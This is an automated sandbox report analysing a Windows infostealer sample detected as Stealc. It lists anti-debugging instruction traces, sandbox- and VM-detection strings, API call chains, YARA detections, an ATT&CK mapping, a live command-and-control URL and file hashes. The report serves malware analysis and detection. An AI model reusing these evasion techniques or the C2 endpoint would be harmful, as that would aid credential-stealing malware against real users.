                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CBF second address: 1230CC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CC9 second address: 1230CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E94E4CBA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CD3 second address: 1230CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230CD7 second address: 1230CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F5E94E4CBAAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230E6D second address: 1230E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123187D second address: 1231894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94E4CBB2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CC7F second address: 123CC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CC85 second address: 123CC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123F4CF second address: 123F4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250D78 second address: 1250D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250C21 second address: 1250C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F5E94757CA3h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1262343 second address: 1262349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1262349 second address: 1262353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E94757C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263156 second address: 126315B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E5B second address: 1268E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E62 second address: 1268E70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E70 second address: 1268E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E76 second address: 1268E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E94E4CBA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268E80 second address: 1268E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126ADA0 second address: 126ADA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850330 second address: 5850334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850334 second address: 5850347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850347 second address: 58503D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E94757C9Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5E94757CA1h 0x00000017 sbb ax, 0306h 0x0000001c jmp 00007F5E94757CA1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F5E94757CA0h 0x00000028 sbb si, 69A8h 0x0000002d jmp 00007F5E94757C9Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5E94757CA5h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504A1 second address: 58504A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504A7 second address: 58504AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504AB second address: 58504CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E94E4CBB5h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504CB second address: 58504DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94757C9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58504DB second address: 5850514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5E94E4CBB7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E94E4CBB5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118FC88 second address: 118FC8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118FE47 second address: 118FE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F5E94E4CBBEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FDF66A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D94910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D8DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D8E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D94570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D8ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D8F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D93EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D8BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D8DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D81160 GetSystemInfo,ExitProcess,0_2_00D81160
                Source: file.exe, file.exe, 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001886000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13703
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13722
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13706
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13718
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13758
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D845C0 VirtualProtect ?,00000004,00000100,000000000_2_00D845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D99860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D99750 mov eax, dword ptr fs:[00000030h]0_2_00D99750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D978E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00D978E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7628, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D99600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D99600
                Source: file.exe, file.exe, 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +~Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D97B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D97980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00D97980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D97850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D97850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D97A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D97A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7628, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7628, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpzEVfile.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/sEOfile.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37R4file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpDEdfile.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/esfile.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpIfile.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpifile.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1541560
                              Start date and time:2024-10-25 00:18:14 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 5s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 81%
                              • Number of executed functions: 20
                              • Number of non-executed functions: 87
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947757131124472
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'826'816 bytes
                              MD5:4af633ceed4aacaf057ea12772b50ad2
                              SHA1:2fc5349b3cf3153eb303ec63dae8f9fa53f62909
                              SHA256:d88360912930f05dad8b9dabaee2ee7a32d568d39566d0b1ef487be6225edefc
                              SHA512:65122eae07414f5b293280ac1c56903b4ddf9ed1d06ee9679ac6b4b56667202ff215822677ec1226676a509a51d08f74cfad978cbaa4fccae4462ae018b5f97b
                              SSDEEP:24576:IcxpoiTsJIMzqLYeOS9/ogvJNEqRYD9/B5Nvj2gLRzJKTDrA1rtaqYR5SArD0ZuI:L3NoDq39/XXRR6vzLMfaaTgAksC5D2
                              TLSH:D08533AA2E27F6EEF6C34C72378D54722CA602601DE6BBF2AD40587453477B83D05B16
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0xa8d000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
